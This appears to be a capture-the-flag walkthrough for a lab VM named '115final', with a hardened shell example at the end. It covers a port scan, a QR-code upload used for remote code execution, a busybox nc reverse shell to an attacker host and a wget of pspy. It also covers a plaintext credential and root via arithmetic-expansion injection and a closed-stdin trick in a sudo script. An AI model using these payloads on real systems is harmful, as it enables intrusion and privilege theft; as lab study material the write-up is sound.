115final

Information Gathering

192.168.100.15

Port Scan

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.15                                                                     [20:03:10]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.15:22
Open 192.168.100.15:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 20:03 CST
Initiating ARP Ping Scan at 20:03
Scanning 192.168.100.15 [1 port]
Completed ARP Ping Scan at 20:03, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:03
Completed Parallel DNS resolution of 1 host. at 20:03, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 20:03
Scanning 192.168.100.15 [2 ports]
Discovered open port 80/tcp on 192.168.100.15
Discovered open port 22/tcp on 192.168.100.15
Completed SYN Stealth Scan at 20:03, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.15
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-21 20:03:26 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:FB:37:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.63 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Scanning 80/tcp

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.15                                                             [20:03:50]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.15/_26-01-21_20-03-56.txt

Target: http://192.168.100.15/

[20:03:56] Starting:
[20:03:57] 403 - 279B - /.ht_wsr.txt
[20:03:57] 403 - 279B - /.htaccess.bak1
[20:03:57] 403 - 279B - /.htaccess.sample
[20:03:57] 403 - 279B - /.htaccess_extra
[20:03:57] 403 - 279B - /.htaccess.orig
[20:03:57] 403 - 279B - /.htaccess.save
[20:03:57] 403 - 279B - /.htaccess_orig
[20:03:57] 403 - 279B - /.htaccessOLD
[20:03:57] 403 - 279B - /.htaccessBAK
[20:03:57] 403 - 279B - /.htaccess_sc
[20:03:57] 403 - 279B - /.htaccessOLD2
[20:03:57] 403 - 279B - /.htm
[20:03:57] 403 - 279B - /.html
[20:03:57] 403 - 279B - /.httr-oauth
[20:03:57] 403 - 279B - /.htpasswds
[20:03:57] 403 - 279B - /.htpasswd_test
[20:03:57] 403 - 279B - /.php
[20:04:07] 403 - 279B - /server-status
[20:04:07] 403 - 279B - /server-status/
[20:04:09] 301 - 318B - /uploads -> http://192.168.100.15/uploads/
[20:04:09] 200 - 407B - /uploads/

The home page is a QR code file upload; the decoded content has to be JSON. Testing showed it has an RCE vulnerability.

Use qrencode to generate a QR code containing a reverse shell

qrencode -o rev.png '{"username": "$(busybox nc 192.168.100.31 7777 -e /bin/bash)"}'


Privilege Escalation

www -> suraxddq

dpkg -V


This shows that ps has been modified.

Looking at it, it simply prints a fixed, hard-coded output.


Upload pspy

cd /tmp/
busybox wget http://192.168.100.18:9999/pspy64
chmod +x pspy64
./pspy64

Credentials obtained


suraxddq:YqsS2MVr2Gvd13LLILdL

suraxddq -> root

suraxddq@115final:/tmp$ sudo -l
Matching Defaults entries for suraxddq on 115final:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User suraxddq may run the following commands on 115final:
(ALL) NOPASSWD: /opt/review.sh

Privilege escalation via sudo

#!/bin/bash


echo "Just Type something."
read Never_Show < /root/root.txt
read Never_Show
echo "$Never_Show"

# review for memory LingMj
# add a Human test

a=$RANDOM$RANDOM$RANDOM
echo "Human Test Number: $a"
read -p "Please Input Number: " b
if [ $((b-a)) != 0 ];then
exit 1;
fi

flag=$(echo $RANDOM$RANDOM$RAMDOM$RANDOM | md5sum | awk '{print $1}')

[[ "$1" == "user" ]] && echo "flag{fakeuser-$flag}"
[[ "$1" == "root" ]] && echo "flag{fakeroot-$flag}"
[[ -z "$1" ]] && echo "flag{fakefake-$flag}"

Approach 1

In a Bash script, $((expression)) is used for arithmetic. One key property is that it performs a "double", i.e. recursive, evaluation of the variables inside the parentheses.

if [ $((b-a)) != 0 ]; then
  • Normal case: if variable b is 5 and a is 3, Bash computes 5-3=2.
  • Vulnerable case: if the content of b is not a number but a string, Bash tries to parse that string again as an expression (a variable name).
  • Command substitution: if during that parsing it encounters $(command) or `command`, Bash executes the command first in order to obtain a numeric value.

Payload construction

The content to feed into variable b: a[$(/bin/bash >&2)]

  • a: a variable that already exists in the script (generated from $RANDOM). In an arithmetic context, writing a[...] is understood by Bash as accessing an array named a.

  • [...]: to determine the array index, Bash must evaluate the contents of the brackets.

  • $(/bin/bash ...): this is command substitution. Before computing the index, Bash starts a new child process running /bin/bash.

  • >&2: when a command runs inside $(( )), its standard output is captured by Bash by default (Bash expects the command to return a number for the computation). >&2 redirects standard output to standard error, so the shell stays usable.

suraxddq@115final:/tmp$ sudo /opt/review.sh
Just Type something.


Human Test Number: 235185078105
Please Input Number: a[$(/bin/bash >&2)]
root@115final:/tmp# whoami
root
root@115final:/tmp#

Or:

suraxddq@115final:/tmp$ sudo /opt/review.sh
Just Type something.


Human Test Number: 92111853617531
Please Input Number: a[`/bin/bash >&2`]
root@115final:/tmp# whoami
root
root@115final:/tmp#

Approach 2

sudo /opt/review.sh <&-

The script first reads root.txt into the variable Never_Show.

At that point Never_Show holds the real root flag.

The following `read Never_Show` then reads from stdin and overwrites Never_Show.

So if stdin is closed, the read command errors when it tries to access it. Because the read fails, the flag already in the variable is not overwritten.

echo "Just Type something."
read Never_Show < /root/root.txt
read Never_Show
echo "$Never_Show"
suraxddq@115final:/opt$ sudo /opt/review.sh <&-
Just Type something.
/opt/review.sh: line 6: read: read error: 0: Bad file descriptor
flag{root-572867788d8a1a040d74bda364121406}
Human Test Number: 20444197425835
/opt/review.sh: line 14: read: read error: 0: Bad file descriptor
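Added example, not the VM's own /opt/review.sh: the human-test check and the answer-reading step of the script rewritten defensively, covering both the arithmetic-expansion bug of Approach 1 and the closed-stdin bug of Approach 2. original_check reproduces the script's `[ $((b-a)) != 0 ]` comparison under bash for contrast; the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the VM's /opt/review.sh. The script's human test was:
#     if [ $((b-a)) != 0 ]; then exit 1; fi
# Arithmetic expansion evaluates the *contents* of b as an expression before
# the comparison, so a non-numeric answer is parsed (and any command
# substitution inside it executed) instead of being rejected.

# The original construct, run under bash so its behaviour is reproduced
# exactly: returns 0 ("human") when $((b-a)) is zero, 1 otherwise.
original_check() {
    bash -c 'a=$1; b=$2; if [ $((b-a)) != 0 ]; then exit 1; fi; exit 0' _ "$1" "$2"
}

# Hardened version: validate the string BEFORE any arithmetic touches it,
# then compare as decimal integers. Both values are passed as arguments, so
# the check itself never reads stdin.
safe_human_check() {
    expected=$1
    answer=$2
    # Only a non-empty run of ASCII digits is accepted; letters, brackets,
    # '$(', operators or whitespace are refused without being evaluated.
    case "$expected" in ''|*[!0-9]*) return 1 ;; esac
    case "$answer"   in ''|*[!0-9]*) return 1 ;; esac
    # [ -eq ] compares as base-10 integers (a leading 0 is not octal here).
    [ "$answer" -eq "$expected" ]
}

# Second weakness: the script reads the flag into Never_Show and relies on a
# later `read Never_Show` to overwrite it. read leaves the variable untouched
# when it fails (stdin closed with <&-), so the secret survives and is echoed.
# Start from an empty variable and honour read's exit status instead.
read_answer() {
    line=''
    if ! read -r line; then
        return 1     # closed or exhausted stdin is a failure, not a value
    fi
    printf '%s\n' "$line"
}
```

With these two changes the script neither evaluates the answer as an expression nor prints a stale variable when the prompt cannot be read.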